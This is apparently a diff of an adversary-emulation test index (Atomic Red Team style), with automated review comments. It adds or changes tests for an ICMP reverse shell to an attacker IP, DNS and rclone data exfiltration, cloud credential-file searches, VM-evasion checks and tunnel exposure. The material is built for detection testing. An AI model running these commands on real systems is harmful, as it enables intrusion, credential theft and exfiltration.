This method allows attackers to communicate and control compromised devices while remaining undetected.
For more details, check this blog: [ICMP Reverse Shell Blog](https://cryptsus.com/blog/icmp-reverse-shell.html)
**Important Notes:**
- Use `[icmp-cnc]` for the C2 server (Attacker) and `[icmpdoor]` for the C2 client (Victim).
- Binaries work on Ubuntu 22.04.5 LTS; for CentOS Stream or other, use the Python file from the GitHub link [https://github.com/krabelize/icmpdoor].
- Root access is required.
supported_platforms:
- linux
executor:
steps: "1. Run the following command on both the attacker and victim machines
to download the required binaries.\n\n mkdir -p /tmp/icmpdoor && wget
-P /tmp/icmpdoor https://github.com/krabelize/icmpdoor/raw/2398f7e0b8548d8ef2891089e4199ee630e84ef6/binaries/x86_64-linux/icmp-cnc
https://github.com/krabelize/icmpdoor/raw/2398f7e0b8548d8ef2891089e4199ee630e84ef6/binaries/x86_64-linux/icmpdoor
&& chmod +x /tmp/icmpdoor/icmp-cnc /tmp/icmpdoor/icmpdoor && echo 'export
PATH=$PATH:/tmp/icmpdoor' >> ~/.bashrc && source ~/.bashrc\n\n2. Start the
C2 server on the attacker system to listen for incoming connections.\n\n
\ icmp-cnc --interface <Network Interface> --destination_ip <VICTIM-IP>\n\n3.
Run the client on the victim machine.\n\n icmpdoor --interface <Network
Interface> --destination_ip <ATTACKER-IP>\n \n4. Cleanup Command: Remove
the icmpdoor directory.\n\n rm -rf /tmp/icmpdoor\n"
name: manual
T1001.003:
technique:
modified: '2024-10-09T15:40:19.436Z'
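Review bot: the manual steps append `export PATH=$PATH:/tmp/icmpdoor` to `~/.bashrc` and `source` it on both hosts, yet step 4's cleanup only runs `rm -rf /tmp/icmpdoor`, so every execution leaves a dangling PATH entry in the shell profile and repeated runs accumulate duplicates; export in the current shell only (drop the `>> ~/.bashrc`) or have the cleanup remove the line. The description states `Root access is required` but no `elevation_required: true` is set, and the `<Network Interface>`/`<VICTIM-IP>`/`<ATTACKER-IP>` placeholders in `steps:` would be better expressed as `input_arguments` like the other tests in this index, so the runner can document and validate them.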
@@ -49024,9 +49172,9 @@ collection:
executor:
name: sh
elevation_required: false
command: "which_python=`which python || which python3`\n$which_python -c \"from
zipfile import ZipFile; ZipFile('#{path_to_output_file}', mode='w').write('#{path_to_input_file}')\"
\n"
command: "which_python=`which python || which python3`\n$which_python -c \"import
tarfile; output_file = tarfile.open('#{path_to_output_file}','w'); output_file.add('#{path_to_input_file}');
output_file.close()\" \n"
cleanup_command: 'rm #{path_to_output_file}
'
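Review bot: the new `command:` switches from `zipfile.ZipFile(...).write(...)` to `tarfile.open('#{path_to_output_file}','w')`; mode `'w'` writes an uncompressed tar (as `ZipFile`'s default `ZIP_STORED` also did), so if the test name or description outside this hunk promises compression, `'w:gz'` is the mode to use. Also check that the `path_to_output_file` default, which is not in this hunk, was updated from a zip to a tar extension so the cleanup `rm` and any consumers stay accurate.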
@@ -50760,50 +50908,7 @@ lateral-movement:
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1021.004
atomic_tests:
- name: ESXi - Enable SSH via PowerCLI
auto_generated_guid: 8f6c14d1-f13d-4616-b7fc-98cc69fe56ec
description: 'An adversary enables the SSH service on a ESXi host to maintain
persistent access to the host and to carryout subsequent operations.
'
supported_platforms:
- linux
input_arguments:
vm_host:
description: Specify the host name of the ESXi Server
type: string
default: atomic.local
vm_user:
description: Specify the privilege user account on ESXi Server
type: string
default: root
vm_pass:
description: Specify the privilege user password on ESXi Server
type: string
default: pass
dependency_executor_name: powershell
dependencies:
- description: 'Check if VMWARE PowerCLI PowerShell Module is installed.
'
prereq_command: |
$RequiredModule = Get-Module -Name VMware.PowerCLI -ListAvailable
if (-not $RequiredModule) {exit 1}
get_prereq_command: 'Install-Module -Name VMware.PowerCLI
'
executor:
command: "Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false
-Confirm:$false \nConnect-VIServer -Server #{vm_host} -User #{vm_user} -Password
#{vm_pass}\nGet-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key
-eq \"TSM-SSH\" } | Start-VMHostService -Confirm:$false\n"
cleanup_command: "Set-PowerCLIConfiguration -InvalidCertificateAction Ignore
-ParticipateInCEIP:$false -Confirm:$false \nConnect-VIServer -Server #{vm_host}
-User #{vm_user} -Password #{vm_pass}\nGet-VMHostService -VMHost #{vm_host}
| Where-Object {$_.Key -eq \"TSM-SSH\" } | Stop-VMHostService -Confirm:$false\n"
name: powershell
elevation_required: true
atomic_tests: []
T1091:
technique:
modified: '2023-10-17T20:42:21.453Z'
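Review bot: this removes the only atomic for T1021.004 (`ESXi - Enable SSH via PowerCLI`, guid `8f6c14d1-f13d-4616-b7fc-98cc69fe56ec`) and leaves `atomic_tests: []`, but no hunk in this compare adds it back under another technique; if it was relocated or dropped on purpose, the PR description should say which, since consumers keying on that GUID will otherwise see it vanish silently.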
@@ -56534,7 +56639,7 @@ credential-access:
identifier: T1552.001
atomic_tests:
- name: Find AWS credentials
auto_generated_guid: 2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17
auto_generated_guid: 37807632-d3da-442e-8c2e-00f44928ff8f
description: 'Find local AWS credentials from file, defaults to using / as the
look path.
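Review bot: `auto_generated_guid` for the existing `Find AWS credentials` test changes from `2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17` to `37807632-d3da-442e-8c2e-00f44928ff8f`; these GUIDs are meant to be stable identifiers that detection mappings and `Invoke-AtomicTest -TestGuids` callers rely on, so unless the old value collided with another test, keep the original.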
@@ -56548,7 +56653,7 @@ credential-access:
type: string
default: "/"
executor:
command: 'find #{file_path} -name "credentials" -type f -path "*/.aws/*" 2>/dev/null
command: 'find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
'
name: sh
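Review bot: the new `find #{file_path}/.aws -name "credentials" -type f` inspects a single `.aws` directory directly under `file_path`, whereas the old `find #{file_path} -name "credentials" -type f -path "*/.aws/*"` walked the whole tree; with the unchanged default of `/` the new command searches `//.aws`, which normally does not exist, so the test finds nothing on a typical host and the description's `defaults to using / as the look path` no longer describes what happens. Keep the `-path "*/.aws/*"` form, or change the default to `$HOME` and update the description to match.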
@@ -56591,6 +56696,65 @@ credential-access:
echo $file ; cat $file ; done
'
- name: Find Azure credentials
auto_generated_guid: a8f6148d-478a-4f43-bc62-5efee9f931a4
description: 'Find local Azure credentials from file, defaults to using / as
the look path.
'
supported_platforms:
- macos
- linux
input_arguments:
file_path:
description: Path to search
type: string
default: "/"
executor:
command: 'find #{file_path}/.azure -name "msal_token_cache.json" -o -name
"accessTokens.json" -type f 2>/dev/null
'
name: sh
- name: Find GCP credentials
auto_generated_guid: aa12eb29-2dbb-414e-8b20-33d34af93543
description: 'Find local Google Cloud Platform credentials from file, defaults
to using / as the look path.
'
supported_platforms:
- macos
- linux
input_arguments:
file_path:
description: Path to search
type: string
default: "/"
executor:
command: 'find #{file_path}/.config/gcloud -name "credentials.db" -o -name
"access_tokens.db" -type f 2>/dev/null
'
name: sh
- name: Find OCI credentials
auto_generated_guid: 9d9c22c9-fa97-4008-a204-478cf68c40af
description: 'Find local Oracle cloud credentials from file, defaults to using
/ as the look path.
'
supported_platforms:
- macos
- linux
input_arguments:
file_path:
description: Path to search
type: string
default: "/"
executor:
command: 'find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
'
name: sh
T1606.001:
technique:
modified: '2023-09-19T21:25:10.511Z'
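Review bot: in the Azure and GCP executors `find ... -name "msal_token_cache.json" -o -name "accessTokens.json" -type f` parses as `-name A -o ( -name B -a -type f )`, because `find`'s implicit `-a` binds tighter than `-o`; group the names, `\( -name "msal_token_cache.json" -o -name "accessTokens.json" \) -type f`, so the type filter applies to both (likewise for `credentials.db`/`access_tokens.db`). All four new tests also use the `#{file_path}/.azure`, `.config/gcloud` and `.oci/sessions` pattern with a default of `/`, which resolves to `//.azure` and so on rather than the per-user home directories their descriptions imply; a `$HOME` default or a `-path`-based search would match the stated intent.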
@@ -59285,7 +59449,7 @@ discovery:
executor:
name: bash
elevation_required: false
command: 'ping -n 4 #{ping_target}
command: 'ping -c 4 #{ping_target}
'
T1069:
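Review bot: `-c 4` is the correct count flag for a `bash` executor; `-n` is the Windows `ping` count switch, while on Linux and macOS it means numeric output and takes no argument, so the old line never produced the bounded four-probe run the test intends.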
@@ -63438,6 +63602,41 @@ discovery:
nc -nv #{host} #{port}
name: sh
elevation_required: true
- name: Port Scan using nmap (Port range)
auto_generated_guid: 0d5a2b03-3a26-45e4-96ae-89485b4d1f97
description: 'Scan multiple ports to check for listening ports with nmap
'
supported_platforms:
- linux
- macos
input_arguments:
host:
description: Host(s) to scan.
type: string
default: 127.0.0.1
port_range:
description: Port range(s) to scan.
type: string
default: 0-65535
dependency_executor_name: sh
dependencies:
- description: 'Check if nmap command exists on the machine
'
prereq_command: 'if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1;
fi;
'
get_prereq_command: "(which yum && yum -y install epel-release nmap)||(which
apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)||(which
pkg && pkg install -y nmap)||(which brew && brew install nmap)\n"
executor:
command: 'nmap -Pn -sV -p #{port_range} #{host}
'
elevation_required: true
name: sh
T1518:
technique:
modified: '2024-04-16T00:16:06.689Z'
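Review bot: the default `port_range` of `0-65535` combined with `-sV` runs service-version probes against every open port; on a host with many listeners that is minutes of runtime, and port 0 is rarely useful, so a narrower default such as `1-1024`, with the full range mentioned in the description, keeps the atomic quick by default. `elevation_required: true` is appropriate because `nmap` without `-sT` uses a SYN scan that needs raw sockets, and the `yum`/`apt-get`/`pkg` installers without `sudo` are consistent with that.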
@@ -68515,7 +68714,7 @@ reconnaissance:
privileges and move laterally. "
modified: '2022-04-15T19:10:23.838Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Wordlist Scanning
name: 'Active Scanning: Wordlist Scanning'
x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
of scanning, such as large quantities originating from a single source (especially
if the source is known to be associated with an adversary/botnet). Monitor
@@ -68533,7 +68732,41 @@ reconnaissance:
- 'Network Traffic: Network Traffic Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
identifier: T1595.003
atomic_tests:
- name: Web Server Wordlist Scan
auto_generated_guid: 89a83c3e-0b39-4c80-99f5-c2aa084098bd
description: 'This test will scan a target system with a wordlist of common
directories and file paths.
'
supported_platforms:
- windows
- linux
- macos
input_arguments:
target:
description: The target system to scan
type: string
default: http://localhost
wordlist:
description: The wordlist to use for scanning
type: path
default: PathToAtomicsFolder/T1595.003/src/wordlist.txt
request_timeout:
description: The timeout for each request (in seconds)
type: integer
default: 5
output_file:
description: File to output results to
type: string
default: "$env:TMPDIR/wordlist_scan.txt"
executor:
command: |
Import-Module "PathToAtomicsFolder/T1595.003/src/WebServerScan.ps1"
Invoke-WordlistScan -Target "#{target}" -Wordlist "#{wordlist}" -Timeout "#{request_timeout}" -OutputFile "#{output_file}"
Write-Host "Scan complete. Results saved to: #{output_file}"
name: powershell
T1591.004:
technique:
x_mitre_platforms:
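Review bot: `output_file` defaults to `$env:TMPDIR/wordlist_scan.txt`, but `TMPDIR` is typically set only on macOS; it is often unset on Linux and the Windows temp directory is `$env:TEMP`, so on two of the three declared platforms the default expands to `/wordlist_scan.txt`, which a non-admin user cannot write. `[System.IO.Path]::GetTempPath()` gives a portable default from PowerShell. The executor imports `PathToAtomicsFolder/T1595.003/src/WebServerScan.ps1` and reads `wordlist.txt` from the same `src/`, neither of which appears in this diff, so confirm both are in the PR; `elevation_required` is also missing here.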
@@ -74165,6 +74398,45 @@ exfiltration:
'
name: sh
- name: Exfiltrate Data using DNS Queries via dig
auto_generated_guid: a27916da-05f2-4316-a3ee-feec67a437be
description: "This test demonstrates how an attacker can exfiltrate sensitive
information by encoding it as a subdomain (using base64 encoding) and \nmaking
DNS queries via the dig command to a controlled DNS server.\n"
supported_platforms:
- macos
- linux
input_arguments:
dns_port:
type: integer
default: '53'
description: Attacker's DNS server port
attacker_dns_server:
type: string
default: 8.8.8.8
description: Attacker's DNS server address
secret_info:
type: string
default: this is a secret info
description: secret info that will be exfiltirated
dependency_executor_name: bash
dependencies:
- description: dig command
prereq_command: which dig
get_prereq_command: 'which apt && sudo apt update && sudo apt install -y bind9-dnsutils
|| which yum && sudo yum install -y bind-utils || which dnf && sudo dnf
install -y bind-utils || which apk && sudo apk add bind-tools || which pkg
&& sudo pkg update && sudo pkg install -y bind-tools || which brew && brew
update && brew install --quiet bind
'
executor:
command: 'dig @#{attacker_dns_server} -p #{dns_port} $(echo "#{secret_info}"
| base64).google.com
'
name: bash
elevation_required: false
T1052.001:
technique:
x_mitre_platforms:
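Review bot: this is the second copy of `Exfiltrate Data using DNS Queries via dig` (same guid `a27916da-05f2-4316-a3ee-feec67a437be`) in this compare, presumably a per-platform index, and the same fixes apply as for the first copy: the `8.8.8.8` default sends the encoded `secret_info` to a public resolver rather than the described controlled server, `base64` output contains `=`, `+`, `/` and newlines that are not valid in a DNS label, `default: '53'` is a string on an integer argument, and `exfiltirated` is misspelled. Fix the source atomic once and regenerate both indexes rather than patching them separately.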
@@ -74307,7 +74579,133 @@ exfiltration:
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1567.002
atomic_tests: []
atomic_tests:
- name: Exfiltrate data with rclone to cloud Storage - AWS S3
auto_generated_guid: a4b74723-5cee-4300-91c3-5e34166909b4
description: |
This test uses rclone to exfiltrate data to a remote cloud storage instance. (AWS S3)
See https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/
supported_platforms:
- linux
- macos
input_arguments:
rclone_path:
description: Directory of rclone.exe
type: path
default: PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone-v*/
exfil_directory:
description: Directory to exfiltrate
type: string
default: PathToAtomicsFolder/../ExternalPayloads/T1567.002/data/
terraform_path:
description: Directory of terraform
type: path
default: PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*
aws_access_key:
description: AWS Access Key
type: string
default: ''
aws_secret_key:
description: AWS Secret Key
type: string
default: ''
aws_region:
description: AWS Region
type: string
default: us-east-1
aws_profile:
description: AWS Profile
type: string
default: default
dependency_executor_name: powershell
dependencies:
- description: 'rclone must exist at (#{rclone_path})
'
prereq_command: 'if (Test-Path "#{rclone_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder/../ExternalPayloads/" -ErrorAction Ignore -Force | Out-Null
$arch = ([System.Runtime.InteropServices.RuntimeInformation]::OSArchitecture).ToString().ToLower()
$operatingSystem = ([System.Runtime.InteropServices.RuntimeInformation]::OSDescription).ToString().ToLower()
if ($operatingSystem -match "darwin") {
Invoke-WebRequest "https://downloads.rclone.org/rclone-current-osx-$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/rclone.zip"
} elseif ($operatingSystem -match "linux") {
Invoke-WebRequest "https://downloads.rclone.org/rclone-current-linux-$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/rclone.zip"
}
Expand-archive -path "PathToAtomicsFolder/../ExternalPayloads/rclone.zip" -DestinationPath "PathToAtomicsFolder/../ExternalPayloads/T1567.002/" -force
- description: terraform must exist at (#{terraform_path})
prereq_command: 'if (Test-Path "#{terraform_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder/../ExternalPayloads/" -ErrorAction Ignore -Force | Out-Null
$arch = ([System.Runtime.InteropServices.RuntimeInformation]::OSArchitecture).ToString().ToLower()
$operatingSystem = ([System.Runtime.InteropServices.RuntimeInformation]::OSDescription).ToString().ToLower()
if ($operatingSystem -match "darwin") {
Invoke-WebRequest "https://releases.hashicorp.com/terraform/1.10.5/terraform_1.10.5_darwin_$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/terraform.zip"
} elseif ($operatingSystem -match "linux") {
Invoke-WebRequest "https://releases.hashicorp.com/terraform/1.10.5/terraform_1.10.5_linux_$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/terraform.zip"
}
Expand-archive -path "PathToAtomicsFolder/../ExternalPayloads/terraform.zip" -DestinationPath "PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v1.10.5/" -force
- description: 'Must provide a valid directory or file path to exfiltrate to
AWS S3
'
prereq_command: 'if (Test-Path "#{exfil_directory}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder/../ExternalPayloads/T1567.002/data" -ErrorAction Ignore -Force | Out-Null
foreach($fileSuffix in 1..10) {
Set-Content "PathToAtomicsFolder/../ExternalPayloads/T1567.002/data/test$fileSuffix.txt" "This is a test file"
}
executor:
command: |
Write-Host "Deploying AWS infrastructure... " -NoNewLine
$awsAccessKey = "#{aws_access_key}"
$awsSecretKey = "#{aws_secret_key}"
cd PathToAtomicsFolder/T1567.002/src/
if ($awsAccessKey -eq "" -or $awsSecretKey -eq "") {
$env:AWS_PROFILE = "#{aws_profile}"
} else {
$env:AWS_ACCESS_KEY_ID = "$awsAccessKey"
$env:AWS_SECRET_ACCESS_KEY = "$awsSecretKey"
}
$null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform init
$null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform apply -var "aws_region=#{aws_region}" -auto-approve
Write-Host "Done!"
Write-Host "Generating rclone config... " -NoNewLine
$config = @"
[exfils3]
type = s3
provider = AWS
env_auth = true
region = #{aws_region}
"@
$config | Out-File -FilePath "PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone.conf" -Encoding ascii
Write-Host "Done!"
Write-Host "Exfiltrating data... " -NoNewLine
$bucket = "$(PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform output bucket)".Replace("`"","")
cd PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone-v*
$null = ./rclone copy --max-size 1700k "PathToAtomicsFolder/../ExternalPayloads/T1567.002/data/" exfils3:$bucket --config "PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone.conf"
Write-Host "Done!"
cleanup_command: |
Write-Host "Destroying AWS infrastructure... " -NoNewLine
$awsAccessKey = "#{aws_access_key}"
$awsSecretKey = "#{aws_secret_key}"
cd PathToAtomicsFolder/T1567.002/src/
if ($awsAccessKey -eq "" -or $awsSecretKey -eq "") {
$env:AWS_PROFILE = "#{aws_profile}"
} else {
$env:AWS_ACCESS_KEY_ID = "$awsAccessKey"
$env:AWS_SECRET_ACCESS_KEY = "$awsSecretKey"
}
$null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform destroy -var "aws_region=#{aws_region}" -auto-approve
Write-Host "Done!"
name: powershell
elevation_required: false
T1030:
technique:
x_mitre_platforms:
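Review bot: the `$null = ...terraform init` and `$null = ...terraform apply` lines discard output and never check the exit code, so a failed apply (bad credentials, wrong region, quota) lets the executor fall through to `terraform output bucket` and `rclone copy` with an empty bucket name, and the "Done!" messages report success regardless. Suggest checking `$LASTEXITCODE` after each terraform call, e.g. `if ($LASTEXITCODE -ne 0) { throw "terraform apply failed" }`; the same applies to `terraform destroy` in the cleanup_command, where a silent failure leaves the bucket (and the copied test files) behind in the account.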
+578 -94
@@ -2714,7 +2714,7 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1497.001
atomic_tests:
- name: Detect Virtualization Environment (MacOS)
- name: Detect Virtualization Environment via ioreg
auto_generated_guid: a960185f-aef6-4547-8350-d1ce16680d09
description: 'ioreg contains registry entries for all the device drivers in
the system. If it''s a virtual machine, one of the device manufacturer will
@@ -2730,6 +2730,49 @@ defense-evasion:
''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment
detected''; fi;
'
- name: Detect Virtualization Environment using sysctl (hw.model)
auto_generated_guid: 6beae646-eb4c-4730-95be-691a4094408c
description: |
sysctl hw.model will return the model name of the hardware(Macmini8,1, MacBookAir10,1, etc.) in case of native Apple hardware
but will return the hypervisor name (VMware7,0).
Reference: https://evasions.checkpoint.com/src/MacOS/macos.html#hardware-model
supported_platforms:
- macos
executor:
name: sh
command: 'if [ "$(sysctl -n hw.model | grep -v ''Mac'')" != "" ]; then echo
''Virtualization Environment detected''; fi;
'
- name: Check if System Integrity Protection is enabled
auto_generated_guid: 2b73cd9b-b2fb-4357-b9d7-c73c41d9e945
description: "The latest versions of macOS have the System Integrity Protection
feature (SIP). If a sandbox uses a non-signed \nkernel extension for monitoring
purposes the, SIP feature must be disabled to load this kind of kernel extension.\nMalware
may check if the SIP is enabled.\nReference: https://evasions.checkpoint.com/src/MacOS/macos.html#sip\n"
supported_platforms:
- macos
executor:
name: sh
command: 'if [ "$(csrutil status | grep -v ''enabled'')" != "" ]; then echo
''Possible Virtualization Environment detected''; fi;
'
- name: Detect Virtualization Environment using system_profiler
auto_generated_guid: e04d2e89-de15-4d90-92f9-a335c7337f0f
description: "system_profiler provides system hardware and software configuration
and the Model Identifier should provide the value similar to (sysctl -n hw.model).
\nWe should be able to find whether virtualization is enabled by checking
whether the Model Identifier does not contain \"Mac\".\n"
supported_platforms:
- macos
executor:
name: sh
command: 'if [ "$(system_profiler SPHardwareDataType | grep "Model Identifier"
| grep -v ''Mac'')" != "" ]; then echo ''Virtualization Environment detected'';
fi;
'
T1070.002:
technique:
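Review bot: the `grep -v 'Mac'` filter on `sysctl -n hw.model` (and the same filter on the system_profiler Model Identifier) will not flag guests of Apple's Virtualization framework on Apple silicon, which report the model `VirtualMac2,1`, so the two descriptions should say the check targets third-party hypervisors such as those named in the ioreg test rather than virtualization in general. Typo in the SIP test description: "purposes the, SIP feature" should read "purposes, the SIP feature". The identical block is added again under `discovery:` in the `@@ -55419,6 +55626,49 @@` hunk, so both copies need the same edits.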
@@ -4511,7 +4554,7 @@ defense-evasion:
text, key: "".join([chr(c ^ ord(k)) for c, k in zip(base64.b64decode(text.encode()),
key)]); command = "#{encrypted_command}"; key = "#{xor_key}"; exec = xor_decrypt(command,
key); subprocess.call(exec, shell=True)'''
cleanup_command:
cleanup_command:
name: bash
elevation_required: false
T1562:
@@ -20450,47 +20493,6 @@ privilege-escalation:
sudo launchctl unload /Library/LaunchDaemons/#{plist_filename}
sudo rm /Library/LaunchDaemons/#{plist_filename}
sudo rm /tmp/T1543_004_atomicredteam.txt
- name: Launch Daemon - Users Directory
auto_generated_guid: 6f899f9d-8a8e-4143-89a5-26fc2c3ec438
description: 'Utilize LaunchDaemon in /Users directory to touch temporary file
in /tmp
'
supported_platforms:
- macos
input_arguments:
plist_filename:
description: filename
type: string
default: com.atomicredteam.T1543.004.plist
path_malicious_plist:
description: Name of file to store in cron folder
type: string
default: "$PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist"
dependency_executor_name: bash
dependencies:
- description: 'The shared library must exist on disk at specified location
(#{path_malicious_plist})
'
prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit
1; fi;
'
get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and
try again."; exit 1;
'
executor:
name: bash
elevation_required: true
command: |
sudo cp #{path_malicious_plist} ~/Library/LaunchDaemons/#{plist_filename}
sudo launchctl load -w ~/Library/LaunchDaemons/#{plist_filename}
cleanup_command: |-
sudo launchctl unload ~/Library/LaunchDaemons/#{plist_filename}
sudo rm ~/Library/LaunchDaemons/#{plist_filename}
sudo rm /tmp/T1543_004_atomicredteam.txt
T1574.008:
technique:
modified: '2024-09-12T15:25:57.059Z'
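Review bot: removing this test is the right call: launchd only scans `/Library/LaunchDaemons` and `/System/Library/LaunchDaemons` at boot, so a plist copied into `~/Library/LaunchDaemons` never persists; the explicit `sudo launchctl load -w` may start it once, but the test did not demonstrate the persistence the technique describes, and the `path_malicious_plist` description "Name of file to store in cron folder" was a leftover from another test. The same block is removed again under `persistence:` in the `@@ -34087,47 +34092,6 @@` hunk. Consider recording the retired GUID `6f899f9d-8a8e-4143-89a5-26fc2c3ec438` in the changelog so detection mappings that reference it can be cleaned up.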
@@ -28724,7 +28726,7 @@ execution:
T1059.010:
technique:
modified: '2024-04-28T15:58:48.119Z'
name: AutoHotKey & AutoIT
name: 'Command and Scripting Interpreter: AutoHotKey & AutoIT'
description: |-
Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
@@ -28776,6 +28778,7 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1059.010
atomic_tests: []
T1059.009:
technique:
@@ -30231,6 +30234,7 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1651
atomic_tests: []
T1059.005:
technique:
@@ -30406,6 +30410,7 @@ execution:
url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
identifier: T1648
atomic_tests: []
T1204.001:
technique:
@@ -34087,47 +34092,6 @@ persistence:
sudo launchctl unload /Library/LaunchDaemons/#{plist_filename}
sudo rm /Library/LaunchDaemons/#{plist_filename}
sudo rm /tmp/T1543_004_atomicredteam.txt
- name: Launch Daemon - Users Directory
auto_generated_guid: 6f899f9d-8a8e-4143-89a5-26fc2c3ec438
description: 'Utilize LaunchDaemon in /Users directory to touch temporary file
in /tmp
'
supported_platforms:
- macos
input_arguments:
plist_filename:
description: filename
type: string
default: com.atomicredteam.T1543.004.plist
path_malicious_plist:
description: Name of file to store in cron folder
type: string
default: "$PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist"
dependency_executor_name: bash
dependencies:
- description: 'The shared library must exist on disk at specified location
(#{path_malicious_plist})
'
prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit
1; fi;
'
get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and
try again."; exit 1;
'
executor:
name: bash
elevation_required: true
command: |
sudo cp #{path_malicious_plist} ~/Library/LaunchDaemons/#{plist_filename}
sudo launchctl load -w ~/Library/LaunchDaemons/#{plist_filename}
cleanup_command: |-
sudo launchctl unload ~/Library/LaunchDaemons/#{plist_filename}
sudo rm ~/Library/LaunchDaemons/#{plist_filename}
sudo rm /tmp/T1543_004_atomicredteam.txt
T1574.008:
technique:
modified: '2024-09-12T15:25:57.059Z'
@@ -41926,7 +41890,125 @@ command-and-control:
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
identifier: T1572
atomic_tests: []
atomic_tests:
- name: Microsoft Dev tunnels (Linux/macOS)
auto_generated_guid: 9f94a112-1ce2-464d-a63b-83c1f465f801
description: |
Dev Tunnels enables insiders as well as threat actors to expose local ports over the internet via Microsoft dev tunnels.
This atomic will generate a dev tunnel binding it to the local service running on the provided port. Can be used to expose local services, web applications and local files etc.
Reference:
- [Microsoft Docs](https://learn.microsoft.com/en-us/tunnels/dev-tunnels-overview)
- [LOT Tunnels](https://lottunnels.github.io/lottunnels/Binaries/devtunnels/)
supported_platforms:
- linux
- macos
input_arguments:
port:
description: port number for tunnel
type: integer
default: 8080
download_url:
description: link to download devtunnel
type: string
default: https://aka.ms/TunnelsCliDownload/linux-x64
binary_path:
description: path to download devtunnel
type: string
default: PathToAtomicsFolder/../ExternalPayloads/devtunnel
dependencies:
- description: 'Download devtunnel
'
prereq_command: 'test -f #{binary_path}
'
get_prereq_command: |
mkdir -p $(dirname #{binary_path})
curl -L "#{download_url}" -o "#{binary_path}"
chmod +x #{binary_path}
- description: 'Login to Microsoft Dev tunnels
'
prereq_command: '#{binary_path} user show | grep -q "Not logged in" && exit
1 || exit 0
'
get_prereq_command: 'echo "Login to devtunnel using the following command:
#{binary_path} user login"
'
executor:
command: "#{binary_path} host -p #{port} &\n"
cleanup_command: |
pkill -9 $(basename "#{binary_path}")
#{binary_path} user logout
rm #{binary_path}
name: bash
- name: VSCode tunnels (Linux/macOS)
auto_generated_guid: b877943f-0377-44f4-8477-f79db7f07c4d
description: |
Visual Studio Code Remote Tunnels can be used for exposing local development environment/services/files over the internet.
This atomic will generate a dev tunnel binding it to the local service running on the provided port.
Reference:
- [Microsoft Docs](https://code.visualstudio.com/docs/remote/tunnels)
- [LOT Tunnels](https://lottunnels.github.io/lottunnels/Binaries/vscode-server/)
supported_platforms:
- linux
- macos
input_arguments:
artifact_base_url:
description: Base URL to download code-cli
type: string
default: https://code.visualstudio.com/sha/download
artifact_build:
description: build to download - Allowed values (stable/insiders)
type: string
default: stable
payload_path:
description: path to download code-cli
type: string
default: PathToAtomicsFolder/../ExternalPayloads
additional_args:
description: additional arguments to pass to code tunnel
type: string
default: ''
dependencies:
- description: 'Install code-cli
'
prereq_command: 'which code
'
get_prereq_command: "ARCH_SUFFIX=$(uname -m | grep -q \"arm64\\|aarch64\"
&& echo \"arm64\" || echo \"x64\")\nif [ \"$(uname)\" = \"Darwin\" ]\nthen
brew install code-cli\nelif [ \"$(expr substr $(uname) 1 5)\" = \"Linux\"
